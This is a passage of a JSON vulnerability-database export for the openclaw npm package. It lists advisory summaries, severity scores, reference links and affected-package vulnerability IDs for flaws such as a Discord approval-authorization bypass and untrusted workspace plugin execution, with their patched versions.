"https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35647", "reference_id": "CVE-2026-35647", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35647" }, { "reference_url": "https://github.com/advisories/GHSA-9wqx-g2cw-vc7r", "reference_id": "GHSA-9wqx-g2cw-vc7r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9wqx-g2cw-vc7r" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-direct-message-policy-bypass-via-verification-notices", "reference_id": "openclaw-direct-message-policy-bypass-via-verification-notices", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-direct-message-policy-bypass-via-verification-notices" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35647", "GHSA-9wqx-g2cw-vc7r" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u6hw-ffpj-4yd9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91801?format=api", "vulnerability_id": "VCID-u9cw-crg5-1kbs", "summary": "OpenClaw: Discord text `/approve` bypasses `channels.discord.execApprovals.approvers` and allows non-approvers to resolve pending exec approvals\n## Summary\n\nDiscord text approval commands resolved pending exec approvals without honoring the configured approver allowlist.\n\n## Impact\n\nA Discord user who was allowed to send commands but was not in the approver list could still approve pending host execution.\n\n## Affected Component\n\n`extensions/discord/src/exec-approvals.ts, src/auto-reply/reply/commands-approve.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `355abe5eba` (`Discord: enforce approver checks for text approvals`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41303", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23525", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23462", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23509", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41303" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/355abe5eba28012e6a95b9923a32831fcf870344", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/355abe5eba28012e6a95b9923a32831fcf870344" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:44Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41303", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41303" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-text-approval-commands", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:44Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-text-approval-commands" }, { "reference_url": "https://github.com/advisories/GHSA-98hh-7ghg-x6rq", "reference_id": "GHSA-98hh-7ghg-x6rq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-98hh-7ghg-x6rq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41303", "GHSA-98hh-7ghg-x6rq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u9cw-crg5-1kbs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89510?format=api", "vulnerability_id": "VCID-una1-gxkk-t3bp", "summary": "OpenClaw: Untrusted workspace channel shadows could execute during built-in channel setup\n## Summary\n\nBefore OpenClaw 2026.4.2, built-in channel setup and login could resolve an untrusted workspace channel shadow before the plugin was explicitly trusted. A malicious workspace plugin that claimed a bundled channel id could execute during channel setup even while still disabled.\n\n## Impact\n\nA cloned workspace could turn channel setup for a built-in channel into unintended in-process code execution from an untrusted workspace plugin. This bypassed the intended workspace-plugin trust boundary during setup and login.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0` — ignore untrusted workspace channel shadows during setup resolution\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41295", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03582", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03589", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03575", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41295" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qrv-rc5x-2g2h", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qrv-rc5x-2g2h" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41295", "reference_id": "CVE-2026-41295", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41295" }, { "reference_url": "https://github.com/advisories/GHSA-2qrv-rc5x-2g2h", "reference_id": "GHSA-2qrv-rc5x-2g2h", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2qrv-rc5x-2g2h" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup", "reference_id": "openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:15Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-channel-shadow-code-execution-during-built-in-channel-setup" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": 